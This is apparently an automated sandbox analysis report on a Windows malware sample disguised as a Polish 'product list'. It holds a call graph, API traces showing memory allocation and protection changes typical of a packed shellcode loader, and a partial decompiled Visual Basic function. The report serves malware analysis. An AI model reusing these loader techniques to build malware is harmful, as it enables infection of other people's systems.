3427->3432 3428->3407 3428->3422 3434 1d738df 7 API calls 3428->3434 3430->3427 3431->3403 3431->3424 3433 1d738df 7 API calls 3432->3433 3433->3426 3436 1d7166e 3434->3436 3436->3407 3437 1d738df 7 API calls 3436->3437 3438 1d716a0 3437->3438 3438->3407 3439 1d716a7 3438->3439 3440 1d738df 7 API calls 3439->3440 3441 1d716bf 3440->3441 3441->3422 3442 1d738df 7 API calls 3441->3442 3443 1d716e2 3442->3443 3443->3211 3445 1d7112c 3444->3445 3445->3445 3446 1d71136 GetPEB 3445->3446 3447 1d738df 7 API calls 3446->3447 3448 1d7117b 3447->3448 3449 1d738df 7 API calls 3448->3449 3451 1d71102 3448->3451 3449->3451 3450 1d7111a 7 API calls 3452 1d73a66 3450->3452 3451->3450 3451->3452 3786 1d718c3 3787 1d718c5 3786->3787 3788 1d738df 8 API calls 3787->3788 3789 1d718db 3788->3789 3790 1d70895 8 API calls 3789->3790 3791 1d72b96 3790->3791 3453 1d707c1 3454 1d707d3 3453->3454 3455 1d7086d 3454->3455 3456 1d70af3 2 API calls 3454->3456 3457 1d7088c 3455->3457 3458 1d70880 3455->3458 3461 1d70af3 2 API calls 3455->3461 3463 1d707e2 3456->3463 3460 1d70895 8 API calls 3457->3460 3458->3457 3459 1d70bd0 8 API calls 3458->3459 3459->3457 3462 1d72b96 3460->3462 3461->3458 3463->3455 3464 1d730ed 3 API calls 3463->3464 3465 1d70832 3464->3465 3466 1d709a1 8 API calls 3465->3466 3467 1d70843 3466->3467 3468 1d70c5e 8 API calls 3467->3468 3468->3455 3843 1d73a4d 3844 1d73a60 3843->3844 3845 1d703d8 3843->3845 3847 1d7111a 8 API calls 3844->3847 3846 1d703ad 8 API calls 3845->3846 3848 1d703dd 3846->3848 3849 1d73a66 3847->3849 3469 1d723f6 3470 1d7240d 3469->3470 3471 1d71d73 8 API calls 3470->3471 3472 1d72412 3471->3472 3792 1d718f4 3793 1d71904 3792->3793 3794 1d72d69 GetPEB 3793->3794 3797 1d72c28 3793->3797 3795 1d72c06 3794->3795 3796 1d72d69 GetPEB 3795->3796 3795->3797 3798 1d72c17 3796->3798 3798->3797 3799 1d72d69 GetPEB 3798->3799 3799->3797 3800 401b65 3801 401b6c __vbaNew2 3800->3801 3803 4109a6 __vbaObjSet 3801->3803 3805 4109e4 3803->3805 3806 410a15 3805->3806 
3807 4109f5 __vbaHresultCheckObj 3805->3807 3808 410a40 3806->3808 3809 410a25 __vbaNew2 3806->3809 3807->3806 3810 410a4a __vbaChkstk __vbaChkstk __vbaChkstk __vbaChkstk __vbaChkstk 3808->3810 3809->3810 3811 410b26 3810->3811 3812 410b57 3811->3812 3813 410b37 __vbaHresultCheckObj 3811->3813 3814 410b5e __vbaChkstk __vbaLateIdSt __vbaFreeObj __vbaFreeVarList 3812->3814 3813->3814 3815 410bb0 __vbaFreeStr __vbaFreeStr __vbaFreeObj 3814->3815 3657 1d71f70 3658 1d71f73 3657->3658 3659 1d738df 8 API calls 3658->3659 3660 1d71f8a 3659->3660 3661 1d71fa2 3660->3661 3662 1d703d8 3660->3662 3664 1d738df 8 API calls 3661->3664 3663 1d703ad 8 API calls 3662->3663 3666 1d703dd 3663->3666 3665 1d71fb4 3664->3665 2949 4013f0 #100 2950 40141a 2949->2950 3084 1d733e1 NtProtectVirtualMemory 3671 1d7256f 3680 1d703ef 3671->3680 3672 1d72bec GetPEB 3672->3680 3673 1d717bd 2 API calls 3673->3680 3674 1d717e9 2 API calls 3674->3680 3675 1d738df 8 API calls 3675->3680 3676 1d7182a 2 API calls 3676->3680 3677 1d72614 3679 1d70aa3 2 API calls 3677->3679 3678 1d704ac 8 API calls 3678->3680 3681 1d72631 3679->3681 3680->3672 3680->3673 3680->3674 3680->3675 3680->3676 3680->3677 3680->3678 3473 1d72de8 3474 1d72bec GetPEB 3473->3474 3476 1d72e04 3474->3476 3475 1d738df 8 API calls 3475->3476 3476->3475 3477 1d72eec 3476->3477 3479 1d72f01 3476->3479 3478 1d72d69 GetPEB 3477->3478 3478->3479 3817 1d71a94 3818 1d71b3f 2 API calls 3817->3818 3819 1d71a9b 3818->3819 3820 1d72d69 GetPEB 3819->3820 3821 1d72f01 3820->3821 3480 407206 3481 407214 VirtualAlloc 3480->3481 3483 407790 3481->3483 3822 1d72e90 3824 1d72e21 3822->3824 3823 1d738df 8 API calls 3823->3824 3824->3823 3825 1d72eec 3824->3825 3827 1d72f01 3824->3827 3826 1d72d69 GetPEB 3825->3826 3826->3827 3484 410e09 __vbaChkstk 3485 410e49 #536 __vbaStrMove __vbaFreeVar 3484->3485 3486 410e8c __vbaFreeStr 3485->3486 3487 1d70f9e 3490 1d70f0f 3487->3490 3488 1d71301 3489 1d730ed 3 API calls 3488->3489 3491 1d7132a 3489->3491 3490->3488 
3492 1d71010 3490->3492 3493 1d738df 8 API calls 3491->3493 3495 1d71017 GetPEB 3492->3495 3497 1d713ac 3493->3497 3494 1d716e3 3496 1d738df 8 API calls 3494->3496 3500 1d7103c 3495->3500 3498 1d716fb 3496->3498 3497->3494 3504 1d738df 8 API calls 3497->3504 3499 1d738df 8 API calls 3498->3499 3502 1d7170e 3499->3502 3501 1d710ff 3500->3501 3506 1d738df 8 API calls 3500->3506 3510 1d710cc 3500->3510 3503 1d7111a 8 API calls 3501->3503 3505 1d738df 8 API calls 3502->3505 3516 1d73a66 3503->3516 3507 1d714bc 3504->3507 3508 1d71721 3505->3508 3506->3500 3507->3494 3511 1d738df 8 API calls 3507->3511 3509 1d738df 8 API calls 3508->3509 3514 1d71738 3509->3514 3512 1d738df 8 API calls 3510->3512 3513 1d71507 3511->3513 3512->3501 3513->3494 3515 1d738df 8 API calls 3513->3515 3517 1d71571 3515->3517 3517->3494 3517->3514 3518 1d738df 8 API calls 3517->3518 3519 1d7166e 3518->3519 3519->3494 3520 1d738df 8 API calls 3519->3520 3521 1d716a0 3520->3521 3521->3494 3522 1d716a7 3521->3522 3523 1d738df 8 API calls 3522->3523 3524 1d716bf 3523->3524 3524->3514 3525 1d738df 8 API calls 3524->3525 3526 1d716e2 3525->3526 3527 401c0f 3528 401c21 3527->3528 3531 41040f __vbaFreeStrList __vbaFreeObjList __vbaFreeVarList __vbaAryDestruct 3528->3531 3530 401c28 3531->3530 3532 1d71998 3533 1d7199e 3532->3533 3535 1d71a03 3533->3535 3536 1d71a06 3533->3536 3538 1d71a0b 3536->3538 3537 1d72d69 GetPEB 3539 1d72f01 3537->3539 3538->3533 3538->3536 3538->3537 3539->3533 3540 1d71798 3541 1d71b3f 2 API calls 3540->3541 3551 1d703ef 3541->3551 3542 1d717bd 2 API calls 3542->3551 3543 1d717e9 2 API calls 3543->3551 3544 1d7182a 2 API calls 3544->3551 3545 1d72614 3546 1d70aa3 2 API calls 3545->3546 3547 1d72631 3546->3547 3548 1d738df 8 API calls 3548->3551 3549 1d72bec GetPEB 3549->3551 3550 1d704ac 8 API calls 3550->3551 3551->3542 3551->3543 3551->3544 3551->3545 3551->3548 3551->3549 3551->3550 3828 1d70898 3830 1d708d2 3828->3830 3829 1d71d6e 8 API calls 3829->3830 3830->3829 3831 
1d70d16 8 API calls 3830->3831 3831->3830 3552 1d70384 3553 1d71b3f 2 API calls 3552->3553 3554 1d7038b 3553->3554 3555 1d703a9 3554->3555 3556 1d72bec GetPEB 3554->3556 3557 1d703ad 8 API calls 3555->3557 3556->3555 3558 1d703dd 3557->3558 3894 1d70000 3895 1d700f5 3894->3895 3896 1d70127 3895->3896 3897 1d71301 3895->3897 3927 1d70151 3896->3927 3899 1d730ed 3 API calls 3897->3899 3900 1d7132a 3899->3900 3901 1d738df 8 API calls 3900->3901 3904 1d713ac 3901->3904 3902 1d716e3 3903 1d738df 8 API calls 3902->3903 3905 1d716fb 3903->3905 3904->3902 3908 1d738df 8 API calls 3904->3908 3906 1d738df 8 API calls 3905->3906 3907 1d7170e 3906->3907 3909 1d738df 8 API calls 3907->3909 3910 1d714bc 3908->3910 3911 1d71721 3909->3911 3910->3902 3913 1d738df 8 API calls 3910->3913 3912 1d738df 8 API calls 3911->3912 3915 1d71738 3912->3915 3914 1d71507 3913->3914 3914->3902 3916 1d738df 8 API calls 3914->3916 3917 1d71571 3916->3917 3917->3902 3917->3915 3918 1d738df 8 API calls 3917->3918 3919 1d7166e 3918->3919 3919->3902 3920 1d738df 8 API calls 3919->3920 3921 1d716a0 3920->3921 3921->3902 3922 1d716a7 3921->3922 3923 1d738df 8 API calls 3922->3923 3924 1d716bf 3923->3924 3924->3915 3925 1d738df 8 API calls 3924->3925 3926 1d716e2 3925->3926 3929 1d70161 3927->3929 3928 1d703ad 8 API calls 3930 1d703dd 3928->3930 3929->3928 3931 1d72421 3929->3931 3559 410619 __vbaChkstk 3560 41065b 7 API calls 3559->3560 3561 410bb0 __vbaFreeStr __vbaFreeStr __vbaFreeObj 3560->3561 3562 4106cc 3560->3562 3564 4106f0 3562->3564 3565 4106d5 __vbaNew2 3562->3565 3566 41074e 3564->3566 3567 41072e __vbaHresultCheckObj 3564->3567 3565->3564 3568 410787 __vbaHresultCheckObj 3566->3568 3569 4107aa 3566->3569 3567->3566 3570 4107b1 __vbaStrMove __vbaFreeObj 3568->3570 3569->3570 3571 4107f8 __vbaObjSet 3570->3571 3572 4107dd __vbaNew2 3570->3572 3574 410840 3571->3574 3572->3571 3575 410871 3574->3575 3576 410851 __vbaHresultCheckObj 3574->3576 3577 410881 __vbaNew2 3575->3577 3578 41089c 
3575->3578 3576->3575 3577->3578 3579 4108fa 3578->3579 3580 4108da __vbaHresultCheckObj 3578->3580 3581 410934 __vbaHresultCheckObj 3579->3581 3582 410957 3579->3582 3580->3579 3583 41095e __vbaFreeStr __vbaFreeObjList 3581->3583 3582->3583 3584 410981 __vbaNew2 3583->3584 3585 41099c __vbaObjSet 3583->3585 3584->3585 3587 4109e4 3585->3587 3588 410a15 3587->3588 3589 4109f5 __vbaHresultCheckObj 3587->3589 3590 410a40 3588->3590 3591 410a25 __vbaNew2 3588->3591 3589->3588 3592 410a4a __vbaChkstk __vbaChkstk __vbaChkstk __vbaChkstk __vbaChkstk 3590->3592 3591->3592 3593 410b26 3592->3593 3594 410b57 3593->3594 3595 410b37 __vbaHresultCheckObj 3593->3595 3596 410b5e __vbaChkstk __vbaLateIdSt __vbaFreeObj __vbaFreeVarList 3594->3596 3595->3596 3596->3561 3689 1d7050e 3690 1d71b3f 2 API calls 3689->3690 3693 1d70519 3689->3693 3690->3693 3692 1d705df 3696 1d72bec GetPEB 3692->3696 3694 1d72eee 3693->3694 3733 1d718e2 GetPEB 3693->3733 3695 1d72d69 GetPEB 3694->3695 3699 1d72f01 3695->3699 3697 1d705fd 3696->3697 3698 1d738df 8 API calls 3697->3698 3700 1d7061a 3698->3700 3701 1d72bec GetPEB 3700->3701 3711 1d7067f 3700->3711 3703 1d70639 3701->3703 3702 1d72bec GetPEB 3704 1d70741 3702->3704 3705 1d738df 8 API calls 3703->3705 3706 1d72bec GetPEB 3704->3706 3705->3711 3707 1d70764 3706->3707 3708 1d738df 8 API calls 3707->3708 3709 1d70789 3708->3709 3709->3694 3710 1d70796 3709->3710 3712 1d72ad5 GetPEB 3710->3712 3711->3694 3711->3702 3716 1d7079b 3712->3716 3713 1d707d3 3715 1d70af3 2 API calls 3713->3715 3717 1d7086d 3713->3717 3714 1d71301 8 API calls 3714->3716 3726 1d707e2 3715->3726 3716->3713 3716->3714 3720 1d707ba 3716->3720 3721 1d70af3 2 API calls 3717->3721 3724 1d70880 3717->3724 3727 1d7088c 3717->3727 3718 1d70bd0 8 API calls 3718->3727 3719 1d70895 8 API calls 3722 1d72b96 3719->3722 3720->3713 3723 1d718c5 3720->3723 3721->3724 3725 1d738df 8 API calls 3723->3725 3724->3718 3724->3727 3725->3727 3726->3717 3728 1d730ed 3 API calls 3726->3728 
3727->3719 3729 1d70832 3728->3729 3730 1d709a1 8 API calls 3729->3730 3731 1d70843 3730->3731 3732 1d70c5e 8 API calls 3731->3732 3732->3717 3733->3692 3932 1d71037 3934 1d7103c 3932->3934 3933 1d710ff 3935 1d7111a 8 API calls 3933->3935 3934->3933 3936 1d738df 8 API calls 3934->3936 3937 1d710cc 3934->3937 3939 1d73a66 3935->3939 3936->3934 3938 1d738df 8 API calls 3937->3938 3938->3933 3085 407726 3086 407741 VirtualAlloc 3085->3086 3087 407790 3086->3087 3088 1d71b3f 3089 1d71b55 3088->3089 3092 1d71c18 3088->3092 3093 1d72bec 3089->3093 3091 1d71bb8 NtAllocateVirtualMemory 3091->3092 3094 1d72bfa 3093->3094 3097 1d72c28 3093->3097 3101 1d72d69 GetPEB 3094->3101 3096 1d72c06 3096->3097 3098 1d72d69 GetPEB 3096->3098 3097->3091 3099 1d72c17 3098->3099 3099->3097 3100 1d72d69 GetPEB 3099->3100 3100->3097 3102 1d72d7b 3101->3102 3102->3096 3940 1d73238 3941 1d73212 3940->3941 3944 1d733e1 NtProtectVirtualMemory 3941->3944 3943 1d732ca 3944->3943 3609 410c35 __vbaChkstk __vbaStrCopy 3610 410c76 __vbaNew2 3609->3610 3611 410c8e 3609->3611 3610->3611 3612 410cb7 __vbaHresultCheckObj 3611->3612 3613 410cce 3611->3613 3612->3613 3614 410cf5 __vbaHresultCheckObj 3613->3614 3615 410d0f 3613->3615 3616 410d13 __vbaStrMove __vbaFreeObj 3614->3616 3615->3616 3617 410d51 __vbaObjSet 3616->3617 3618 410d39 __vbaNew2 3616->3618 3620 410d8a 3617->3620 3618->3617 3621 410d95 __vbaHresultCheckObj 3620->3621 3622 410daf 3620->3622 3623 410db3 __vbaFreeObj 3621->3623 3622->3623 3624 410ddb __vbaFreeStr __vbaFreeStr 3623->3624 3836 1d718ac 3837 1d71b3f 2 API calls 3836->3837 3838 1d718b6 3837->3838 3738 410ebc __vbaChkstk 3739 410efe __vbaVarCopy __vbaVarTstEq 3738->3739 3740 410f33 __vbaVarTstEq 3739->3740 3741 410f23 __vbaVarCopy 3739->3741 3742 41111f 7 API calls 3740->3742 3743 410f4e __vbaLenVar __vbaVarForInit 3740->3743 3741->3742 3745 41108c 3743->3745 3746 410fb4 9 API calls 3745->3746 3747 411099 __vbaVarAdd #650 __vbaVarMove __vbaFreeVarList 3745->3747 3748 41107c 
__vbaVarForNext 3746->3748 3747->3742 3748->3745

                  Executed Functions

                  Control-flow Graph

                  control_flow_graph 203 1d71b3f-1d71b4f 204 1d71b55-1d71c12 call 1d72bec NtAllocateVirtualMemory 203->204 205 1d71c18-1d71cac call 1d72b5a call 1d71c5a 203->205 204->205
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000), ref: 01D71BF4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID: fel
                  • API String ID: 2167126740-998966389
                  • Opcode ID: 9a3c85134a3d365950eb5d71adbce10e784b8a870bffcdea00dba4eba8e0cf75
                  • Instruction ID: 77e33c544734b3206097bdff7907b2cae3fa223fb798222c9ff5b2419f46ce53
                  • Opcode Fuzzy Hash: 9a3c85134a3d365950eb5d71adbce10e784b8a870bffcdea00dba4eba8e0cf75
                  • Instruction Fuzzy Hash: D22138B15007899FEB315F38CC51BDF76A2EF45354F10822CEE899F2A4D7748A808B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  control_flow_graph 213 407206-407212 214 407260-4073bc 213->214 215 407214-407245 213->215 220 4073c2-40744c 214->220 215->214 223 407452-4077dd VirtualAlloc 220->223 235 4077e3-407898 call 40791e 223->235 240 40789e-4078f9 235->240 243 4078fc 240->243 243->243
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID:
                  • String ID: ]
                  • API String ID: 0-1813045944
                  • Opcode ID: 0ed6bdb513bd94b69ad78142c241a7ca4e1d67942e1e0807a5d8e35ee95db196
                  • Instruction ID: 0654c5c579814525cd69a9c404a01ecbc6dc6d6fb0272bf24d6b79db9abba7be
                  • Opcode Fuzzy Hash: 0ed6bdb513bd94b69ad78142c241a7ca4e1d67942e1e0807a5d8e35ee95db196
                  • Instruction Fuzzy Hash: CA813562F18B1185FF352128C9E056C6502DBD2344F32873BCD6A33DC55B3E16C6265B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  control_flow_graph 244 407246-4073bc 250 4073c2-40744c 244->250 253 407452-4077dd VirtualAlloc 250->253 265 4077e3-407898 call 40791e 253->265 270 40789e-4078f9 265->270 273 4078fc 270->273 273->273
                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID: ]
                  • API String ID: 4275171209-1813045944
                  • Opcode ID: 2107def32f4d190f21624457edce8cc9f0d855102c199a55899f6ea0447b6c5b
                  • Instruction ID: 37cc49b4028cb5ee1b2d669398556f8c8fdcfddf01ea1d6de6b56072586c2096
                  • Opcode Fuzzy Hash: 2107def32f4d190f21624457edce8cc9f0d855102c199a55899f6ea0447b6c5b
                  • Instruction Fuzzy Hash: 8F811462F18B5185FF362128C9E056D6502EF96340F32873BCD6A33DC55B3E16C6269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  control_flow_graph 304 1d733e1-1d733fc NtProtectVirtualMemory
                  APIs
                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,01D73169,00000040,01D7132A,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 01D733FA
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                  • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                  • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                  • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 58%
                  			E00408444(signed int _a4) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				char _v48;
                  				short _v72;
                  				void* _v76;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				char _v92;
                  				long long _v116;
                  				signed int _v120;
                  				intOrPtr _v124;
                  				long long _v136;
                  				char _v140;
                  				short _v144;
                  				char _v164;
                  				short _v168;
                  				short _v180;
                  				void* _v184;
                  				void* _v192;
                  				long long _v800;
                  				long long _v808;
                  				void* _v812;
                  				intOrPtr _v820;
                  				char _v828;
                  				void* _v832;
                  				signed int _v836;
                  				char _v840;
                  				char _v848;
                  				signed int _v852;
                  				intOrPtr _v864;
                  				char _v872;
                  				char _v888;
                  				intOrPtr _v916;
                  				char _v924;
                  				char _v944;
                  				signed int _v948;
                  				char _v952;
                  				intOrPtr _v956;
                  				long long _v960;
                  				intOrPtr _v964;
                  				char _v968;
                  				signed int _v972;
                  				signed int _v976;
                  				signed int _v980;
                  				signed int _v984;
                  				signed int _v1320;
                  				signed int _v1324;
                  				signed int _v1328;
                  				signed int _v1332;
                  				signed int _v1336;
                  				signed int _v1364;
                  				intOrPtr* _v1368;
                  				signed int _v1372;
                  				signed int _v1376;
                  				intOrPtr* _v1380;
                  				signed int _v1384;
                  				signed int _v1388;
                  				intOrPtr* _v1392;
                  				signed int _v1396;
                  				signed int _v1400;
                  				intOrPtr* _v1404;
                  				signed int _v1408;
                  				signed int _v1412;
                  				intOrPtr* _v1416;
                  				signed int _v1420;
                  				intOrPtr* _v1424;
                  				signed int _v1428;
                  				signed int _v1432;
                  				intOrPtr* _v1436;
                  				signed int _v1440;
                  				signed int _v1444;
                  				intOrPtr* _v1448;
                  				signed int _v1452;
                  				signed int _v1456;
                  				signed int _v1460;
                  				signed int _v1464;
                  				signed int _v1468;
                  				signed int _v1472;
                  				intOrPtr* _v1476;
                  				signed int _v1480;
                  				signed int _v1484;
                  				intOrPtr* _v1488;
                  				signed int _v1492;
                  				signed int _v1496;
                  				signed int _v1500;
                  				intOrPtr* _v1504;
                  				signed int _v1508;
                  				signed int _v1512;
                  				intOrPtr* _v1516;
                  				signed int _v1520;
                  				signed int _v1524;
                  				char* _t588;
                  				signed int _t592;
                  				signed int _t597;
                  				signed int _t611;
                  				signed int _t617;
                  				signed int _t622;
                  				signed int _t627;
                  				signed int _t631;
                  				signed int _t635;
                  				char* _t640;
                  				signed int _t644;
                  				signed int _t651;
                  				signed int _t655;
                  				signed int _t657;
                  				signed int _t664;
                  				signed int _t670;
                  				signed int _t674;
                  				signed int _t678;
                  				signed int _t684;
                  				signed int _t688;
                  				signed int _t692;
                  				signed int _t698;
                  				char* _t703;
                  				signed int _t710;
                  				signed int _t715;
                  				signed int _t722;
                  				signed int _t727;
                  				signed int _t734;
                  				signed int _t739;
                  				signed int _t745;
                  				signed int _t750;
                  				char* _t754;
                  				signed int _t762;
                  				signed int _t767;
                  				signed int _t774;
                  				signed int _t779;
                  				signed int _t786;
                  				signed int _t792;
                  				char* _t796;
                  				signed int _t799;
                  				void* _t800;
                  				void* _t857;
                  				void* _t861;
                  				intOrPtr _t866;
                  				long long _t919;
                  
                  				 *[fs:0x0] = _t866;
                  				L004011F0();
                  				_v16 = _t866;
                  				_v12 = 0x401180;
                  				_v8 = _a4 & 0x00000001;
                  				_a4 = _a4 & 0xfffffffe;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, _t857, _t861, _t800,  *[fs:0x0], 0x4011f6);
                  				_push(3);
                  				_push(0x4031f4);
                  				_t588 =  &_v48;
                  				_push(_t588);
                  				L004013D0();
                  				_push(0x402fe0);
                  				_push(0x402fe0);
                  				L004013BE();
                  				_v864 = _t588;
                  				_v872 = 8;
                  				_push(1);
                  				_push( &_v872);
                  				_push( &_v888);
                  				L004013C4();
                  				_v916 = 0x402fe0;
                  				_v924 = 0x8008;
                  				_push( &_v888);
                  				_t592 =  &_v924;
                  				_push(_t592);
                  				L004013CA();
                  				_v972 = _t592;
                  				_push( &_v888);
                  				_push( &_v872);
                  				_push(2);
                  				L004013B8();
                  				if(_v972 != 0) {
                  					_v864 = 2;
                  					_v872 = 2;
                  					L004013AC();
                  					L004013B2();
                  					L004013A6();
                  					_v864 = 1;
                  					_v872 = 2;
                  					_t796 =  &_v872;
                  					L004013A0();
                  					L004013B2();
                  					L004013A6();
                  					_t919 =  *0x401178;
                  					L0040139A();
                  					_t799 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t796, _t796, 0xffffffff, 0xfffffffe, 0xfffffffe, 0xfffffffe,  &_v872);
                  					asm("fclex");
                  					_v972 = _t799;
                  					if(_v972 >= 0) {
                  						_v1364 = _v1364 & 0x00000000;
                  					} else {
                  						_push(0x64);
                  						_push(0x402ae0);
                  						_push(_a4);
                  						_push(_v972);
                  						L00401394();
                  						_v1364 = _t799;
                  					}
                  				}
                  				_v864 = 2;
                  				_v872 = 2;
                  				_push( &_v872);
                  				L004013AC();
                  				L004013B2();
                  				L004013A6();
                  				_t597 =  &_v828;
                  				_push(_t597);
                  				E00402D94();
                  				_v948 = _t597;
                  				L0040138E();
                  				if(_v948 == 0x58) {
                  					if( *0x4123c0 != 0) {
                  						_v1368 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1368 = 0x4123c0;
                  					}
                  					_v972 =  *_v1368;
                  					_t762 =  *((intOrPtr*)( *_v972 + 0x14))(_v972,  &_v848);
                  					asm("fclex");
                  					_v976 = _t762;
                  					if(_v976 >= 0) {
                  						_v1372 = _v1372 & 0x00000000;
                  					} else {
                  						_push(0x14);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1372 = _t762;
                  					}
                  					_v980 = _v848;
                  					_t767 =  *((intOrPtr*)( *_v980 + 0xc0))(_v980,  &_v944);
                  					asm("fclex");
                  					_v984 = _t767;
                  					if(_v984 >= 0) {
                  						_v1376 = _v1376 & 0x00000000;
                  					} else {
                  						_push(0xc0);
                  						_push(0x403014);
                  						_push(_v980);
                  						_push(_v984);
                  						L00401394();
                  						_v1376 = _t767;
                  					}
                  					_v168 = _v944;
                  					L00401382();
                  					if( *0x4123c0 != 0) {
                  						_v1380 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1380 = 0x4123c0;
                  					}
                  					_v972 =  *_v1380;
                  					_t774 =  *((intOrPtr*)( *_v972 + 0x14))(_v972,  &_v848);
                  					asm("fclex");
                  					_v976 = _t774;
                  					if(_v976 >= 0) {
                  						_v1384 = _v1384 & 0x00000000;
                  					} else {
                  						_push(0x14);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1384 = _t774;
                  					}
                  					_v980 = _v848;
                  					_t779 =  *((intOrPtr*)( *_v980 + 0xf8))(_v980,  &_v836);
                  					asm("fclex");
                  					_v984 = _t779;
                  					if(_v984 >= 0) {
                  						_v1388 = _v1388 & 0x00000000;
                  					} else {
                  						_push(0xf8);
                  						_push(0x403014);
                  						_push(_v980);
                  						_push(_v984);
                  						L00401394();
                  						_v1388 = _t779;
                  					}
                  					_v1320 = _v836;
                  					_v836 = _v836 & 0x00000000;
                  					L004013B2();
                  					L00401382();
                  					if( *0x4123c0 != 0) {
                  						_v1392 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1392 = 0x4123c0;
                  					}
                  					_v972 =  *_v1392;
                  					_t786 =  *((intOrPtr*)( *_v972 + 0x1c))(_v972,  &_v848);
                  					asm("fclex");
                  					_v976 = _t786;
                  					if(_v976 >= 0) {
                  						_v1396 = _v1396 & 0x00000000;
                  					} else {
                  						_push(0x1c);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1396 = _t786;
                  					}
                  					_v980 = _v848;
                  					_v916 = 0x80020004;
                  					_v924 = 0xa;
                  					L004011F0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_t792 =  *((intOrPtr*)( *_v980 + 0x54))(_v980, 0x10,  &_v852);
                  					asm("fclex");
                  					_v984 = _t792;
                  					if(_v984 >= 0) {
                  						_v1400 = _v1400 & 0x00000000;
                  					} else {
                  						_push(0x54);
                  						_push(0x403024);
                  						_push(_v980);
                  						_push(_v984);
                  						L00401394();
                  						_v1400 = _t792;
                  					}
                  					_v1324 = _v852;
                  					_v852 = _v852 & 0x00000000;
                  					_v864 = _v1324;
                  					_v872 = 9;
                  					_t597 = 0x10;
                  					L004011F0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_push(0);
                  					_push(_v820);
                  					L0040137C();
                  					L00401382();
                  					L004013A6();
                  				}
                  				_push(0x8966da);
                  				E00402EBC();
                  				_v948 = _t597;
                  				L0040138E();
                  				if(_v948 == 0x1e61) {
                  					if( *0x4123c0 != 0) {
                  						_v1404 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1404 = 0x4123c0;
                  					}
                  					_v972 =  *_v1404;
                  					_t745 =  *((intOrPtr*)( *_v972 + 0x14))(_v972,  &_v848);
                  					asm("fclex");
                  					_v976 = _t745;
                  					if(_v976 >= 0) {
                  						_v1408 = _v1408 & 0x00000000;
                  					} else {
                  						_push(0x14);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1408 = _t745;
                  					}
                  					_v980 = _v848;
                  					_t750 =  *((intOrPtr*)( *_v980 + 0x110))(_v980,  &_v836);
                  					asm("fclex");
                  					_v984 = _t750;
                  					if(_v984 >= 0) {
                  						_v1412 = _v1412 & 0x00000000;
                  					} else {
                  						_push(0x110);
                  						_push(0x403014);
                  						_push(_v980);
                  						_push(_v984);
                  						L00401394();
                  						_v1412 = _t750;
                  					}
                  					_v1328 = _v836;
                  					_v836 = _v836 & 0x00000000;
                  					L004013B2();
                  					L00401382();
